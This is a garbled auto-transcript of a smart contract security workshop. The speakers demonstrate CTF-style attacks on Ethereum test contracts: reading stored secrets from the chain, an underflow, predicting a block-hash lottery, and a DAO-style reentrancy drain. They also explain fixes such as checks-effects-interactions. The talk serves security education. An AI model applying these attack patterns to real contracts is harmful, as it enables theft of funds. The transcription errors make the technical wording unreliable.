 Hi everyone, this is the Freaking Smart Contract Workshop. We have more people here, but I'm Cheyenne, Dean, John. We are part of Consent Intelligence. We do smart contract security and code editing. If you have any security consultation or you want to work on dApps, you are here to help, you can go to our website with audits and more, and also Meet Next Team, which is smart contract security service. Instead of tools, you can run and see if your code has common mistakes or not. So the agenda here is that we do this quick intro. We go through the high level introduction to Ethereum just to know we are in the same space. And you go through some of the tools we have in the green mix, some of the ones that you can start playing around with Ethereum. And more details on how Ethereum works, how the memory works. We demo a few tools which make it easier for you to actually get through these challenges and also some of their captive replies or CPS. And we have a few challenges at the end that we try to act together. You are hoping to have a two-hour workshop if the desks have proper setups. So we are going to just drink everything in one hour and probably do more. Of course, I don't want to say interacting. So we are going to take you back around for the last time. We are going to talk about that. What should I take? Just for the time being. And so where, what is the familiarity of the group here? Has everybody written this for a contract at some point? More or less? Do you feel like you understand what the state looks like and like logs and opcodes and things like that? Okay, I'll go super fast. It will take five minutes. Great. But it's good to review and somebody probably didn't want to admit that they don't know all these things. So Ethereum, what is Ethereum? Ethereum is like all of these accounts, they have these four properties. Every single account has a balance, a balance, a code, maybe a heavy and maybe storage. So the state is made up of this great big list of accounts. There are contract accounts and external accounts. External accounts don't have code, don't have storage. There's opcodes, they do things in the VM. There you go. Sorry. It didn't seem like that. Okay, so this is useful to be reminded of even if you're familiar with this stuff in the context of security. That there are these two types of transactions. You can just send money or send the heath from one externally owned account, EOA to another. Or you can send him a contract. Magic happens when you send the heath to a contract, send this transaction. The contract can do any other sort of internal transactions. Message calls, it's sometimes called. This creates a state transition. Contracts can call each other. And this is like, it gets worse, right? I heard recently that the average call depth on the mainnet is getting deeper all the time. And contracts are increasing composability. Someone could stop saying interoperability, E2.0 took the interoperability away, and now he's saying composability. I just figured that out. So this composability is creating a lot more complexity. Things are having a lot more deeply in the call stack. And that may have interesting implications. Can everybody hear me at the back? Or do I need to project more? Okay. Gas, I mean, there's gas. I think you all know what gas is. But the block gas limit, that's really important. Actually, gas is who appears subscribed to my newsletter? Morellian's Smart Contract Security newsletter, right? So I can't stop talking about, like, I want to do a newsletter. It's not about gas. But it's the most interesting thing to me really right now. So the block gas limit, that can get you in a lot of trouble if you run out of all the possible gas that any miner will ever give you. And then if your op codes just change in price and you were counting on them not doing that. Sorry. There's a table of op codes with gas prices. I made these slides. Okay, except blocks. That's a lot to change. There are a few things there that almost like for the gas price. So if you increase gas price even by one way, miners would mind that. Impartialize that over the other one. So you can front run or get ahead of the other transaction by just increasing the gas price with one way. Or the fact that the block size, the limit is like, because blocks are limited, there are scars. So you can do some like crypto-economics plays or like some attacks based on that. It was just over all those things. Front running is, if you want to talk front running, go deep on that. Talk to Cheyenne. He's in some really interest. And there's a lucky duck tomorrow at four if I'm not too late. Over off, front running taxonomy. So I can't take over. All right. So as I said, this was supposed to be a more hands-on workshop and I'm going to be hands-on. And you can also follow if you are interested. So you can go to this link. There's also on the whiteboard. And if you go to this link, there's one like this. So you're going to see this gist here. It's about the challenges. You can pick on challenge one. You can see a challenge here. If these are not challenges, I just want to make sure we are on the same level. Before that, one thing you can do. Just to know exactly, again, we are on the same level. This is a solid DT. I guess everyone here is familiar with solid source code. But if it doesn't do anything special here, you just have a variable name, owner, and just when you say hi. It puts the name in the name and it's a high name. So nothing really special here. So there's a few things I want you to know. One is like about this slide that things are public. If you go to Robson, which is EtherScan Robson. You can see everything information on blockchain and what is happening. So let's say you want to store a value. So I'm getting a head on myself. I'm going to the end here. So if you want to store a value on a blockchain, don't ever store secrets or anything. You won't know that, but you won't know how that works and what that means. So a lot of times in smart contracts, the memory starts at here. So it's called slot zero. So how you can see that, you can actually see where the memory is stored. So you can actually go here and you can see the memory. They think that constructs are used. So you can actually read the text that was passed to the contract through these data. They have GBH2, but there is this data here too. So I'm working on this other tool called Legions for now. Machin is really better. I'll send a link on Twitter later on. But this is something to be able to easily poke around nodes and smart contracts. So in this case, I just want to show you what our name might have. So let's say this smart contract. I just copy the address. So I run this tool. So this tool has a nice interface and you can tell all the information that there is. So in this case, what we need is to connect to a node. Connect to a node, which is now our user option. You can use your own node or connect to any node. By default, it's connected to mainnet. Here, it's connected to SNET to just be able to query things. So it gives you a bunch of options. So this tool, you can check it out later. It's not important here. I just want to show you how to read the story. In this case, I want to read when you do query. You can read the balance, the details of a block, code of a smart contract, do some cryptography things, and even read storage. So in this case, I want to read the storage or this address that I just copied. So imagine that you have a secret in that smart contract. So when I click, it goes query the first 10 storage there. So this is what smart contracts are, the UMCs, but this tool also tries to cast that stream. So it reads the first 10 storage and you can see that even though that storage should not be visible from outside, I mean, based on transaction software development, it is. So we can read hello there from here. There are other tools here you can use. This tool, as I said, is not part of this workshop necessarily, but go around play it. If you want to add a function to it, function attribute is like, perfect. And as I said, I read like this whole interface of the common line and nice interface there. So getting back to where we were. Yeah, if you go to this link, that link kick.to, you're going to have to go through a bunch of challenges. One is this challenge. One, that if you look, it's really simple. It has a balance, when you open the balance, it has like 10 you can buy and whether you pass on it, it adds to your balance and burn and whatever that you have. Specify it, it's going to burn. Do you see any way to have an infinite balance here? Very easy. It will underflow. Yeah, exactly. Do you want your trip the most now? No, I don't. Do you want to next showcase the tool? No, I don't want to. They showcase how easy it is. Next one. So you basically did how a code editor finds his part and goes through the code, find what it is. There are some tools that you mentioned that makes it easier to actually find these common vibes. There you go. Challenge one. So yeah, people here use Remix. Anyone? Remix? Remix is great. So one of the great things that we've been working on lately is this MythX platform, which is a security as a service tool that you throw smart contracts at it and then it throws back a bunch of bugs at you. So it's pretty great. Another awesome thing is it's built right into Remix. So if you do the plugins thing, like MythX, it goes up, you hit that activate button. And as it turns out, if you load in challenge one while you do the Remix thing, you hit the Analyze button. What was it? The screenshot is already set up. It's all on the right track. Anyway, so yeah, so you see you hit the Analyze button and it spits out the issues on the bottom. You click on the issues and it actually goes to the line of code. So super convenient, super neat. A good way to cheat on workshops and everything. Yeah, very cool. Also, if you create an account on MythX.io, you'll have persistence results. If you just do the scan with Remix, it does it kind of like a sample address and it goes away and it can refresh. But if you create your own account, you can set up the account with your credentials. And that's kind of nice. Also, if you want to pay money, it's a premium service, so you don't have to pay money, but if you do pay money, you get much deeper scans. Like if you have large contracts, it'll actually spend a long time on symbolic execution. It goes a lot deeper because it's great. So do that in AOS. There's also these command line tools, which are great. Savor and MythX, if you like JavaScript stuff, MythX, CLI, if you like Python stuff, they both have truffle integration. It's pretty good. Other goodness. So this is mainly for more as someone, but it's likely drops and tests that's where I think can either go to boss.meta.io or pay me or I have like a functional phone, I can just send it to you right now. Just to like finish what Dean was saying, so here, like let's say for this challenge, MythX is here, like when you install it to plugins, so MythX is here, you can just press analyze and it actually looks for you and finds all the issues. So here, it says I can overflow, even though like if you're passing message of value so that someone should send that much money to overflow, which is less realistic, but this one is the amount that is user input so you can easily underflow, as you said, and do that. So, that's the goal. You're getting thrilled. These are definitely both not hacky-sacks. You can use the hacky-sacks. Alright, so we touched on these, but if gas runs out for any reason, your function calls reverse and the whole state change doesn't happen anymore, and there are fallback functions that will be involved if you just don't mention any function names or you mention a function name that doesn't exist. So that has been there for some of the hacks that like the transaction does not exist and it runs a fallback function and sorry to document the change, it's the best way to look at it. We're going to introduce some other ones too. So, this is where I ran, dropped ahead myself so I won't talk about the warehouse storage and I already talked about these legions, which this is a link if you want to download and look at. I already showed that to you. But there is also this blog post from one of our colleagues. The link was long, so this is the best way to find it. If you google understanding Ethereum smart contract storage and click on this program, the blockchain.com, this is a good blog. It goes around different patterns, how to implement arrays, how to implement different things. And if you have any questions there, just hit us up at the Digest team and the author works there. So, the other challenge, we just talked about how to store, how not to store secrets right there on the smart contract. Just kind of stand up and use the machine. So, in the traditional way, the best way to store passwords is to hash it, right? So, you can hash a password in Saudi TV with Ketchak so you can just hash, save the Ketchak and use that. So, it seems like a good way, right? If anyone looks at the variable, they still cannot guess what the password is. But it really depends on how you store that. So, everything on Ethereum is definitely in public. So, in this case, in this case, if you go on Challenge 2, is it big enough for you guys to see? Is it better? So, yeah, this is simple. For people that have done so, this might be too simple. So, this is just a contract that gets the password, saves the password, and later on, you can guess the password and get the money out from there. So, in this case, you might say that anyone sending a guest password transaction, you can see the password running. But even before that, you can just add the same way as we were doing before, and go to Rockston, and just see the password there. If that's as easy as it gets. So, the constructor, you can go there and this is a transaction we did for another conference. Yes, this is what we're not saying. But you can see the contract there. So, it's the easiest way. You can even still do tools and read some other ways. All right. So, I'm confused about that. So, I'm going to introduce your randomness. So, can you get some applications that you might need that randomness for? You can. Games. Or, yeah, gambling, not serious. So, it's a lot of use and promotion of blockchain has been on these kind of applications, too. You don't see this that much these days. So, you can really get randomness. Because early on, people started to use different aspects, different timestamps for the randomness. But all those people can guess or they can just interpret it on them. So, they were like, all right, let's try to use some other things I've not known from before. Like, the block hash or the hash, the block hash, or some other variation of that. So, let's see if that works or not. So, we have this other challenge which basically is this one. It's a lottery. It has one Ethereum in there. So, you have to pass a number and put some value in there because you have to pay for the lottery ticket. And this part is using the hash of the last block and you hash that and it turns to a number. And if your guess is the same as the number, it transfers you as much as you pay. So, this seems to be like a random that you wouldn't know. But how would you guess this or how would you win this one lottery? I would write this on a contract that does this calculation and then it holds the lottery function with the right number. Yeah, exactly. A year for the wallet. So, one PowerPoint here is like in order to attack this contract you have to write the contract, deploy the contract and use that contract to attack this contract. So, you run your code in the same environment that this code is running at the same time. So, here in order to attack this you have to write one... Yeah, good question. Do we actually have to write a separate smart contract? Since this is looking at the previous block you could just look if that was the lottery and then send this transaction with a highway and basically get it into the next block. That's possible that you're risking because there's a 15 second block so if you miss that block you miss that money you have to send another transaction. You can try to get in but it's a race. But there's a short track. This is much more elegant than you see to pull off. Yeah, there has been some other lotters like that and we've seen attacks that people send like a thousand transactions just to make sure they get in but that means for... if you miss one block if you look at the current block you'd have to brute force this but since it's in the previous block there's both ways to do that. Yeah, but that's a race. No, you can't unlock the hash of the current block. Yeah, there's no hash of the current block. Specify the runtime. So that's why it's using... So, let's say let's attack this together here. So, I'm cheating. I have to comment it over here just to say... Yes, so... What you do is... Okay, so one thing is you don't need to have a full function here you can just have the interface but this is easier for now for us. And... as I said, this was supposed to be something you solved but I just solved it here. So what you have to do is... So now, in this case, what I need to do is... I already deployed this before so we can check. There's transaction. There's this much ether. So what I've got to do is just deploy this transaction. So... So... I think I know why this was because I have a function. One trick is to change this to constructor so you don't have to deploy and call the function again. So in this case you have to deploy this contract call attack with the input of the target, which is the target's address. And you have to pass some value in there. So what it does is it calls target's lettering function which is this function with some value which is the message.value. This value is how much money if it's attached to that. And with the number that this contract is calculating here as well. So if the number is the same it sends out one easy way to make it more ethically good hack so you would get the money back and be clear of the development. So here we just compiled we used the injectability so we're using MetaMask here just making sure I'm not attacking our mainnet. Yeah. I'll set it all back a little bit. And we have this message sender so let's write it out. We need to... I'm going to do the analysis. 5 to 10... Is it constructed in 5? In 9.4? It's only in the right 5. Didn't construct the key word come out in 5? Not 4. What's the word? Didn't construct the key word come out in 5? Not 4. Yeah, it's like 8.4. Is this error as he says in 9 you can see it comes out in 5.3. Should we just come right back? There's a 5. Free juggling modes, whoever Yeah. There's a 5.1. Oh, yeah? More juggling modes. Yeah. Alright, so the address was this address we were asking before some transactions so we got confused we passed this address all the time but we passed Don't you forget to fold it? Sorry? Fold that? No, here so it's 9.7.7 do message or send it so it's going to send it back to... Who's calling? Who's calling? Oh, I... In fact, that's the problem. Sorry to call it target. It's like you OK, so it should be fine OK, something's wrong. Fail. Oh, you're right. Let me send any value in there. Yes. Why is that what we said? Alright, let's try this again. Just pay for the the problem was so here this contract except for us to send some money with that and we didn't have any money attached to this transaction so that's why that transaction failed so we're sending some other transaction now so as you can see we transferred one way to this address and he sends us this is like 1337 but it's not showing you the property so we now won the contract and self-destruct after that so in order to see it much better maybe this is the way to see it so in terms of transaction you can see it's sent one way got this much send it back to the message just send there and self-destruct so one of the main points of this was to say that you can attack the contract with another contract just to get the same environment same code same environment, same variables everything that the contract has access to is there any questions or comments about this the debugging was fine alright so this is like similar example but in the sense that you need a contract to attack the contract but it goes back to Dao's story and I hope everyone here knows about Dao and know what we've learned about Dao from Dao that smart contracts are hard just don't put that much money on them so Dao is from classic do you know the relation between classic and Dao it started from there and we had to say attack so there is attack patterns but they go slower here because I think I'm going slow but yeah, are we going too fast? no is it too slow? is it too slow? okay we might need more time so yeah, so Dao attack the main was like the two lines of code that should have been replaced the other way around so here you can see that the value so someone can call digital it checks if the balance is fine it sends the value to the caller it reduced the balance of the balance of the caller by that value this was the pattern so something was wrong here what was wrong was that here the attack here can contract that is the basically the balance holder and the balance holder can call redraw so this is the fallback function that we were saying calls this redraw again so how the attack works is the attack here calls this attack function which calls the victim's function to the DAO we draw one unit of token then checks the balance sees the balance and it calls it sends one wave or one token to the attack here and attack here so we said the fallback function gets executed when there is no other function assigned to that so it calls this table it runs the draw again and this goes on back and forth and it drains the contract so would you say this attack is called the GOREF for this benefit attack why is that? because there is no stock condition yeah exactly so yeah exactly you run out of gas here so if you can just do a few loops that was good you can just do a few loops here it runs out of gas yeah maybe you can eat the stack unit first yeah exactly so there are few checks you can do here one is there is this awful call gas left how much gas is left but you have to do a lot of math there to see if you should do another call or not there is another way to say if the balance of the if this balance here if this balance is how much left here you have to have an exit condition there because you can't really run it forever it doesn't stop and if it runs out of gas so you use all the balances and you have to act in there so as we said at the end it's $180 million or something like that but these two lines should have been the other way around that's what makes security that's what makes it really hard because it seems fine but it should be at the other way around there is a pattern that says check effects and interactions so you can check and do the effect and then do the interactions so for this you're going to try to do every interesting attack and still money from this charity this is just for education the contract we have here is pretty simple it has a mapping that this is a really common pattern in other token contracts so we have this area of mapping of balances that holds the balances there is an event that doesn't really matter constructors so it requires to have one ether in there and it adds that one ether to the message to send their balance so anyone can donate, it's payable anyone can donate to their own balance they donate to charity, they get the balance you can check your balance and you can bid to all as you can see it's using the same pattern as the down so it checks the balance it sends that out and if you succeed this is a new offer that was added in certified it just admits an event and reduces the balance so you want to attack this I want to make it more interactive as possible but I don't know exactly how I'm going to show you the solution so the rest we have to do is like let's try to write it together or let's try this how would you what would be the stop condition here if you want to do a bitter attack how would you try to what stops you from doing this loop of drain head contact total balance of the contract is smaller than my balance of the contract so you want to get more than half of the balance if nothing is left if my call will fail because it runs out of balance then I stop I mean if your balance so you're just studying your balance yes if the balance in the mapping on my address is bigger than the total balance of the contract yeah so I'm going to upload that it just means like a key of 1 and the total balance is 100 or if you're saying it has like 0.5 you don't want to try it with fraud 1 you don't want to be bad you can actually catch that just kind of like code here so this is like basically equivalent of using stack or upload or anything like this you can copy and code and try to make it work that always works yeah exactly so here exactly the attack here we are using the constructor because it's easier here to do but then you can call attacks so here you have to like donate first you have to have a balance in that charity to be able to attack because if not really calling balance withdraw, it checks if you have a balance in there or not it's easy to do that fast so in constructor we pass the target address which is the challenge we need to have that in the same place and then we donate the message that's valid that's passed to this deployment and then after that you have to call this attack so I'm going to just deploy it and then walk through that with you challenge forward after here I'm just going to show you here that there is a balance here there is this one balance there alright so I would say this challenge should fail so it doesn't put any value here so it doesn't matter it looks like anyway here call this again alright so after this mine what it does is it sends whatever we send this to the charity and as you can see created this contract and it sends 10 ways to our charity so in here we should see that we have the balance for that contract if you want to check there is also this easy way to check there is easy way to check a lot of things here you can use the challenge forward which is the charity first I have this you have to deploy it and you can just get access to access to the functionality that there is so now you can check the balance of the this one contract which is this one contract you can check the balance and it is 10 as you said 10 ways does it index to volume checkers you'll see you should let's attack this and then we can experiment with them so we go back here we look at the code it's the same a pattern as we talked about so if you call attack it's going to involve withdrawal with the total balance of that address and it's going to send the fall back it's going to get the fall back I mean the withdrawal is going to call the fall back and if you address this the target is more than one ether you would try again so I guess I'll send someone to that address first it's already that much more than one ether I'm just going to send one ether to this address so let's try this because at the end we're going to try mid-takes and see if it can find this so there is no input because we already passed the contract to the target so attack one mistake I did is that I didn't send that to the proper address I came one minute ago anyways I guess you got the whole point I'm not sure if I have to debug this now but if the attack is successful it should learn something like this this is the right contract because here this is the transaction we sent out and they internally tried to send really confused myself here trying to do something cool here sorry should we click both from the sense of the gas and the balance so here there is an arbitrary check it just checks that the target balance has more than one ether and the problem here is send this to less of the money so it has to run multiple transactions so if I send a 0.1 ether it's going to be much easier to attack it right now but in general it's on the safe side because we can divide two different conditions so if you want to do that you can do the result this check you can do it I think gas left it's less than I think you can do 2300 2300 for a transfer and if there is gas left then just return it don't continue something like this would work also as well but what we are excited to do is to see how Mithics would find us and we can just run it on the original one so this is the the time that they contract is wonderful so we can run Mithics here Challenge 4 Analyze are you locked in? I think I met an email that my friend said we'll get you we'll get you to count so you can't take off too much you can start troubling I learned this trick from Ray it's not a drilling trick I'm just pulling there's like 90% what what questions do people have about security what anxieties do people have about writing smart contracts where for security experts what could you really get out of this in a few minutes if you could ask me some questions does anybody have you like to deploy to contracts in the main menu in like trouble how did that feel scary as hell quite easy I had my I had my gas my gas so it was super fast took like 3 seconds or something and it cost me $200 right that $200 to minimize the time oh yeah it was like better than and this is Chris from Maker yeah this is the first I had I had personally I've never deployed anything of consequence to the main menu like my stuff but I've never like deployed anything that like matters a lot so I I don't care about that anybody else I deployed once in my third orbit yeah my scope I try to use the not working and then I use the half of anything half of what half anything and then I just mix and it's 0.01 huh gas calculation is hard does anybody ever like had a contract on you or like lost money in some you know in the many ways that you can use money in this world that you come from engineering I have I have too nobody John when do you know you're ready once we've audited your coverage I like you know I think you have done all you can right there's a point of diminishing return when like there's just no other like like you're a blog post and like you read it you can't do anything you can't even see your own typos so you get somebody else to do it that's us you're prepared you're like well prepared I have a blog post about Aaron Christmas contract audit tweet that but yeah so like there's a lot of things you can do to not get a very good result from an audit by just like dropping some code with no documentation on us or you can like do your work internally up front to be really ready for it come to us like one advance maybe we decide the best thing to do is to like work with you for a few days just to like give you like hey like fix this fix this delete this and then like you get a better audit you know be able to focus just on like going keeper and I think that's like that's like being well prepared for an audit can make like an audit more affordable and effective for most people and and I think like most smaller teams that like our maker can afford to like write documentation if you're willing to take the time to do it usually if you write good documentation or specs for your code like sure you just hacked out the code maybe you wrote tests first in which case you're like doing great with the curve but then if you like sit and you're like try to communicate in pros like just plain English to someone else what your code does you have to read it I guarantee you'll find like something you'll like be like well wait does it actually do that thing when this happens and you'll read it again you'll be like oh no it actually does something I did not think it does that's that's a great thing to do I highly recommend it yeah writing inline comments and documentation and overall what this app should do is explain you can see the line the code and the comment like is it what I'm saying they should do like that helps a lot like you don't need to be grass and charts like that so actually actually so we have free and pro version and we actually limited to the premium version so I'm going to show you that on my machine basically the result you get is these two things and they are both relevant for their attack so whenever you make a low level call like here to another conflict then the EVM gets all the gas that is still left to execute the other conflict's code and if you do that then then you should never change the world state after you did it because the conflict's trusted that this change might never happen because the other conflict can re-enter that conflict so that's the thing we're born about is effects and if you move this line up here over the call then the issue is fixed and the balance will be detected the first time already and it won't matter if you re-enter it so it's that check effects interactions right one thing I just wanted to show do you have the challenge here so I just think there's a readme file I'm not going to show the last slide again but there is this there's practices there's practice that it's open source there's a lot of contribution has been done please read that there's a lot of good things there and if you see any mistakes this is captured on Twitter some of the challenges were based on that you can just play around do CTF style things and hack contacts it's really fun this is how you can find us on Twitter and also if you're interested in auditing either as a client or reading the audit reports you can find all our blog posts audit reports that are thrown out public all there it's really interesting to see the bugs that were found how they were fixed and I guess you have like 2-ish left so thank you for being here and job calls are back there thanks